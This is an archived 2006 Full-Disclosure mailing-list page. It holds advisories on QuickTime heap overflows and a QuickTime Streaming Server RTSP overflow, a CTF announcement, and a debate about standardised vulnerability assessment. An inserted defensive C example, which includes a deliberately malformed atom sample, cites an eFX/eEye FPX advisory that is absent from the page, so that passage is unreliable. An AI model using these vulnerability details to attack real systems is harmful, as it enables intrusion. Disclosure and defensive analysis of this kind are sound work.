  if ($img) {
return $img;
  }
  }

  function load_gif($img_path) {
  $img = imagecreatefromgif ($img_path);
  if ($img) {
return $img;
  }
  }

  function load_jpg($img_path) {
  $img = imagecreatefromjpeg ($img_path);
  if ($img) {
  return $img;
 

[Full-disclosure] ZDI-06-015: Apple QuickTime H.264 Parsing Heap Overflow Vulnerability

2006-05-11 Thread zdi-disclosures
ZDI-06-015: Apple QuickTime H.264 Parsing Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-015.html
May 11, 2006

-- CVE ID:
CVE-2006-1463

-- Affected Vendor:
Apple

-- Affected Products:
Apple QuickTime versions prior to 7.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since March 20, 2006 by Digital Vaccine protection
filter ID 4183. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Apple's QuickTime media player.

The specific flaw exists within the parsing of H.264 content. The
implicit trust of a user-supplied size value during a memory copy loop
allows an attacker to create an exploitable memory corruption
condition. Exploitation requires that an attacker either coerce the
target to open a malformed media file or visit a website embedding the
malicious file.

-- Vendor Response:
Apple has identified and corrected this issue in QuickTime 7.1.
Customers can obtain the fix from Apple's Software Downloads web site:

http://www.apple.com/support/downloads/

For further details see:

http://docs.info.apple.com/article.html?artnum=61798

-- Disclosure Timeline:
2006.03.20 - Vulnerability reported to vendor
2006.03.20 - Digital Vaccine released to TippingPoint customers
2006.05.11 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by ATmaCA.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.




[Full-disclosure] Kenshoto Report: IIS 6.0 Remote Exploit PoC

2006-05-11 Thread Kenshoto CTF
Once again ...
kenshoto will be running the Defcon Capture the Flag contest in 2006.
This year's CtF will be a knock-down-drag-out-cyberninja war, the 
likes of which the world has never seen (except maybe last year).

For the qualifying round, we've widened the scope from last year. With
multiple challenges in various categories, there's something for 
every hacker, regardless of skillset (except running scripts and writing
perl).

The core skill for this contest will be finding vulnerabilities in
software. Those of you who have avoided playing in CtF because you
think it is for lamers, we bet you can't find all our vulnerabilities.

Teams will still need to defend a server, and will need to be able to 
exploit the vulnerabilities they find. As last year, the vulnerabilities
will be 100%-custom, so leave your nessus, metasploit and core impact
bullshit at home.

There will be a qualifying round, which will start on Friday, June 9th 
at 10:00 PM EDT. Only 8 teams will qualify. Last year's winners, Shellphish, are 
automatically qualified (leaving 7 team slots), unless they too decide to play 
in the qualifying round, in which case they will still need to place in the top 
8. 

Registration is currently open at http://kenshoto.com/quals/ 

We encourage anyone (even individuals) to attempt to qualify, even if as a 
learning experience. We intend quals to be enjoyable for everyone, regardless of 
your plans for Defcon. Challenges will range wildly in difficulty from Mitnick 
to Eagle; we've got it all. Good luck... you're going to need it. 

-kenshoto



[Full-disclosure] Apple QuickTimeStreamingServer RTSP Server Vulnerability [MU-200605-02]

2006-05-11 Thread noreply

Apple QuickTimeStreamingServer RTSP Server Vulnerability
[MU-200605-02]
May 11, 2006

http://labs.musecurity.com/advisories.html

Affected Product / Versions:

QuickTimeStreamingServer 5.5 and earlier

Product Overview:

The Real Time Streaming Protocol (RTSP) is a protocol which allows a
client to remotely control a streaming media server.  RTSP is
implemented in the QuickTimeStreamingServer, a cross platform media
streaming server.

Vulnerability Details:

A remote buffer overflow condition in Apple's RTSP service could
allow for arbitrary code execution.  The vulnerable code is triggered
with the use of a malformed RTSP header.

Vendor Response / Solution:

Mu Security would like to thank Apple for timely remediation of these
vulnerabilities.

Credit:

This vulnerability was discovered by the Mu Security research team.

http://labs.musecurity.com/pgpkey.txt

Mu Security is an early-stage innovator creating a new class of
security analysis system. The company's mission is to widely deploy
security analysis and reduce product and application vulnerabilities.
Mu's founders include industry-recognized experts in the IDP, open
source protocol analysis tools, ethical hacking, and network
management markets. The security analysis process and product solution
provide a rigorous and streamlined methodology for verifying and
improving the security readiness of any IP-based product or
application.  Mu Security, headquartered in Sunnyvale, California, is
backed by preeminent venture capital firms including Accel Partners
and Benchmark Capital.

The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.




[Full-disclosure] How secure is software X?

2006-05-11 Thread David Litchfield

How secure is software X?

At least as secure as Vulnerability Assessment Assurance Level P; or Q or R. 
Well, that's what I think we should be able to say. What we need is an open 
standard, that has been agreed upon by recognized experts, against which the 
absence of software security vulnerability can be measured - something which 
improves upon the failings of the Common Criteria. Let's choose web server 
software as an example. When looking for flaws in a new piece of web server 
software there are a bunch of well known checks that one would throw at it 
first. Try directory traversal attacks and the several variations. Try 
overflowing the request method, the URI, the query string, the host header 
field and so on. Try cross site scripting attacks in server error pages and 
file not found messages. As I said, there's a bunch of checks and I've 
mentioned but a few. If these were all written down and labelled as a 
standard then one could say that web server software X is at least as 
secure as the standard - providing of course the server stands up.


For products that are based upon RFCs it would be trivial to write a simple 
set of criteria that tests every aspect of the software as per the RFCs. This 
would be called Vulnerability Assessment Assurance Level: Protocol. If a bit of 
software was accredited at VAAL:Protocol then it would be given a level of 
assurance that it at least stood up to those attacks.


Not all products are RFC compliant however. Sticking with web servers, one 
bit of software might have a bespoke request method of FOOBAR. This opens 
up a whole new attack surface that's not covered by the VAAL:Protocol 
standard. There are two aspects to this. Anyone with a firewall capable of 
blocking non-RFC compliant requests could configure it to do so - thus 
closing off the attack surface - from the outside at least. As far as the 
standards go however - you'd have to introduce criteria to cover that 
specific functionality. And what about different application environments 
running on top of the web server? And what about more complex products such 
as database servers? I suppose at a minimum for DB software you could at 
least have a standard that simply checks if the server falls to a long 
username or password buffer overflow attempt and then fuzz SQL-92 language 
elements. It certainly makes standardization much more difficult but I think 
by no means impossible.


Clearly, what is _easy_ is writing and agreeing upon a VAAL:Protocol 
standard for many different types of servers. You could then be assured that 
any server that passes is at least as secure as VAAL:Protocol and for those 
looking for more comfort then they can at least block non-RFC compliant 
traffic.


Having had a chat with Steve Christey about this earlier today I know there 
are other people thinking along the same lines and I bet there are more 
projects out there being worked on that are attempting to achieve the same 
thing. If anyone is currently working on this stuff or would like to get 
involved in thrashing out some ideas then please mail me - I'd love to hear 
from you.


Cheers,
David Litchfield
http://www.databasesecurity.com/
http://www.ngssoftware.com/



Re: [Full-disclosure] How secure is software X?

2006-05-11 Thread Michael Silk

On 5/12/06, David Litchfield [EMAIL PROTECTED] wrote:

 SNIP


why do we need this?

you're referring to what already takes place commercially.

hi i want a security assessment.

who's going to do these assessments for free? who confirms that the
people doing the assessment know what they are doing?

Customer: I was hacked .. - me: - David Litchfield told me it was
secure, blame him - David Litchfield: Oh no, our VAAL is just a
guide. - Customer: So why the hell do I care about it then?

Guides for people to use are okay (hello OWASP Guide, and others) but
all you're trying to start is a non-commercial free security assessment
service.

... ?

-- Michael



Re: [Full-disclosure] How secure is software X?

2006-05-11 Thread David Litchfield

From: Michael Silk [EMAIL PROTECTED]

SNIP


why do we need this?


Take your average bit of common software. I can bet someone's thrown Spike 
at it, someone else crazyfuzz, and another foofuz. Now let's say that it 
stood up to everything that was thrown at it - and let's say another product 
crumbled in the first few seconds. I'd rather have the first product on my 
network if, as a business requirement, I need the functionality that that 
software provided. Sure - it's not a guarantee that it's devoid of security 
vulnerability but I can be assured that the software's not going to fall to 
a script kiddie.


If a product did stand up to Spike, crazyfuzz and foofuzz then let's talk 
about it! The problem is you only ever hear about it when these fuzzers 
actually find things.


What I'm suggesting is simply collating our bug-hunting collective knowledge 
into a standard. Those who wish to protect their trade secret bug find 
techniques don't have to play if they don't want.


But in answering why do we need this? you clearly don't - but there are 
people out there that do need this - or at least would like it.



you're referring to what already takes place commercially.
hi i want a security assessment.
who's going to do these assessments for free? who confirms that the
people doing the assessment know what they are doing?


The thing with a standard is that it is a standard. As such, efforts should be 
entirely reproducible. Have 3 or more people follow that standard and 
compare results at the end. If there's a discrepancy someone's not following 
the standard. The other aspect, of course, is that it's trivial to write and 
verify tools that follow a standard.




Customer: I was hacked .. - me: - David Litchfield told me it was
secure, blame him - David Litchfield: Oh no, our VAAL is just a
guide. - Customer: So why the hell do I care about it then?



Guides for people to use are okay (hello OWASP Guide, and others) but
all your trying to start is a non-commercial free security assessment
service.


Absolutely. Let's face it - it's what goes on every day, anyway. At least 
people who care about assurance would be able to make something useful out 
of all that effort. Besides, who said it had to be free? Like CC - if a 
company wanted their product evaluated they could pay for it. Or not. I'm 
sure cost will become relevant at some point but not now. I'm more 
interested in the technical merits at the moment.


Cheers,
David Litchfield
http://www.databasesecurity.com/
http://www.ngssoftware.com/



[Full-disclosure] Apple QuickTime udta ATOM Heap Overflow

2006-05-11 Thread Sowhat

Apple QuickTime udta ATOM Heap Overflow


By Sowhat of Nevis Labs
Date: 2006.05.12

http://www.nevisnetworks.com
http://secway.org/advisory/AD20060512.txt


Vendor:
Apple Inc.


Affected Versions:
Apple QuickTime versions  7.1


Overview:
We have discovered a critical vulnerability in Quicktime Player.
The vulnerability allows an attacker to execute arbitrary code
in the context of the user who executes QuickTime.

This vulnerability can be exploited by persuading a user to open
a carefully crafted .mov file or visit a website embedding the
malicious .mov file.


Details:
This vulnerability exists in the way Quicktime processes the udta Atom of
the .mov files.

The layout of a udta (user data atom) atom:

                                   Bytes
  _______________________________
 | User data atom                |
 |   Atom size                   |   4
 |   Type = 'udta'               |   4
 |                               |
 |   User data list              |
 |     Atom size                 |   4
 |     Type = user data types    |   4
 |                               |
  -------------------------------



By setting the value of the Atom size to a large value such as 0x,
an insufficiently-sized heap block will be allocated, and resulting in a
classic complete heap memory overwrite during the RtlAllocateHeap() function.




Vendor Response:

2006.05.06  Vendor notified via [EMAIL PROTECTED]
2006.05.07  Vendor responded
2006.05.09  Vendor asked for more information
2006.05.11  Vendor released QuickTime 7.1
2006.05.12  Advisory released


Vendor was contacted on 05/06/2006, and they said:
This message is being sent to you by a security analyst who has reviewed
your note.  The issue is being investigated, and we appreciate the time
you have taken to report it to us. 

This vulnerability no longer exists in their new release (7.1);
however, the vendor didn't formally inform me about the patch.


Greetings to Ajit, Chi, Xin, Linlin and all guys in India  US Nevis Labs


Reference:
1. http://developer.apple.com/documentation/QuickTime/QTFF/index.html
2. http://docs.info.apple.com/article.html?artnum=303752





--
Sowhat
http://secway.org
Life is like a bug, Do you know how to exploit it ?

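Both the eEye FPX advisory and the udta atom advisory above describe the same missing step: a size taken from the file is used for an allocation (number*0x200, or the atom size) without first being checked. The following is an added example, not code from eEye, Nevis Labs or Apple, of what that check looks like: the atom layout follows the advisory's table, the sample bytes are constructed, and the exact parsing QuickTime performs is an assumption.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FPX_BLOCK_SIZE 0x200u   /* one FPX data block, per the eEye advisory */

/* Size a buffer for nblocks FPX blocks of 0x200 bytes each. The unchecked
 * product nblocks * 0x200 is the integer overflow the advisory describes;
 * here the multiplication is refused when it would wrap a 32-bit size.
 * Returns true and stores the byte count on success. */
bool fpx_blocks_to_bytes(uint32_t nblocks, uint32_t *out_bytes)
{
    if (nblocks > UINT32_MAX / FPX_BLOCK_SIZE) {
        return false;           /* product would not fit in 32 bits */
    }
    *out_bytes = nblocks * FPX_BLOCK_SIZE;
    return true;
}

/* A QuickTime atom header as laid out in the udta table above: a 32-bit
 * big-endian size that includes the 8-byte header, then a 4-character type. */
struct atom_hdr {
    uint32_t size;
    char     type[5];
};

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Parse one atom header at buf and validate the declared size against the
 * bytes actually available, so an atom size such as 0xFFFFFFFF inside a
 * small file is rejected before anything is allocated or copied from it.
 * (The size-0 and size-1 extended forms are deliberately not handled.) */
bool parse_atom_header(const uint8_t *buf, size_t avail, struct atom_hdr *hdr)
{
    if (avail < 8) return false;        /* not even a complete header */
    uint32_t size = be32(buf);
    if (size < 8) return false;         /* must at least cover its own header */
    if (size > avail) return false;     /* declared size exceeds the container */
    hdr->size = size;
    memcpy(hdr->type, buf + 4, 4);
    hdr->type[4] = '\0';
    return true;
}

/* Constructed sample: a 16-byte 'udta' atom holding one 8-byte child atom. */
const uint8_t SAMPLE_GOOD_UDTA[16] = {
    0x00, 0x00, 0x00, 0x10, 'u', 'd', 't', 'a',
    0x00, 0x00, 0x00, 0x08, 'n', 'a', 'm', 'e'
};

/* Constructed sample: same 16 bytes, but the atom size field claims 0xFFFFFFFF. */
const uint8_t SAMPLE_BAD_UDTA[16] = {
    0xFF, 0xFF, 0xFF, 0xFF, 'u', 'd', 't', 'a',
    0x00, 0x00, 0x00, 0x08, 'n', 'a', 'm', 'e'
};

int main(void)
{
    struct atom_hdr hdr;
    uint32_t bytes;

    printf("udta size 0x10:       %s\n",
           parse_atom_header(SAMPLE_GOOD_UDTA, sizeof SAMPLE_GOOD_UDTA, &hdr)
               ? "accepted" : "rejected");
    printf("udta size 0xFFFFFFFF: %s\n",
           parse_atom_header(SAMPLE_BAD_UDTA, sizeof SAMPLE_BAD_UDTA, &hdr)
               ? "accepted" : "rejected");
    printf("0x80 blocks:          %s\n",
           fpx_blocks_to_bytes(0x80u, &bytes) ? "ok" : "overflow");
    printf("0x800000 blocks:      %s\n",
           fpx_blocks_to_bytes(0x800000u, &bytes) ? "ok" : "overflow");
    return 0;
}
```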


Re: [Full-disclosure] Microsoft MSDTC NdrAllocate Validation Vulnerability

2006-05-11 Thread . Solo
Shut the fuck up!!

2006/5/11, [EMAIL PROTECTED] [EMAIL PROTECTED]:
 Shouldnt this be considered low risk and not medium?

 On Wed, 10 May 2006 17:01:09 -0700 Avert [EMAIL PROTECTED] wrote:

 McAfee, Inc.
 McAfee Avert(tm) Labs Security Advisory
 Public Release Date: 2006-05-09
 Microsoft MSDTC NdrAllocate Validation Vulnerability
 CVE-2006-0034

 * Synopsis
 There is an RPC procedure within the MSDTC interface in msdtcprx.dll
 that may be called remotely without user credentials in such a way that
 triggers a denial-of-service in the Distributed Transaction Coordinator
 (MSDTC) service.
 Exploitation can at most lead to a denial of service and therefore the
 risk factor is at medium.

 * Vulnerable Systems
 Microsoft Windows 2000
 Microsoft Windows XP
 Microsoft Windows Server 2003

 * Vulnerability Information
 The msdtcprx.dll shared library contains RPC procedures for use with
 the Distributed Transaction Coordinator (MSDTC) service utilized in
 Microsoft Windows.
 By sending a large (greater than 4k) request to BuildContextW(), a
 size check can be bypassed and a bug in NdrAllocate() may be reached.
 This vulnerability was reported to Microsoft on October 12, 2005

 * Resolution
 Microsoft has provided a patch for this issue. Please see their
 bulletin, KB913580, for more information on obtaining and installing
 the patch.

 * Credits
 This vulnerability was discovered by Chen Xiaobo of McAfee Avert Labs.

 * Legal Notice
 Copyright (C) 2006 McAfee, Inc.
 The information contained within this advisory is provided for the
 convenience of McAfee's customers, and may be redistributed provided
 that no fee is charged for distribution and that the advisory is not
 modified in any way. McAfee makes no representations or warranties
 regarding the accuracy of the information referenced in this document,
 or the suitability of that information for your purposes.
 McAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee,
 Inc. and/or its affiliated companies in the United States and/or other
 Countries. All other registered and unregistered trademarks in this
 document are the sole property of their respective owners.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How secure is software X?

2006-05-11 Thread Blue Boar

So pin it down a bit more for me.

Do you want just public results of standardized blackbox testing? 
Something similar to the ICSA firewall certification?  (Though, I assume 
you want actual public results.)


Would you include source review?  The Sardonix project tried to do that.

Who does the testing, and who pays for the time and equipment to do 
that?  Do all products get re-tested every time a new version of the 
product suite is released?  Do the test suites have to be free?  Do they 
re-test for every release of the victim software?


Don't people like yourself derive some benefit from having some portion 
of your assessment work stay proprietary?  If I'm trying to enhance the 
test suite with some new fuzzing, and I find a sexy bug, don't the 
incentives tend to lean towards me selling the bug to iDefense and 
hiding my fuzzer in the meantime?


Don't we fairly quickly arrive at all products passing all the standard 
tests, and passing no longer means anything?


I like the idea, but I'm wondering why people would contribute.  I'm 
also wondering how it can stay consumer-beneficial, and not end up 
being driven by product vendors.


BB

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/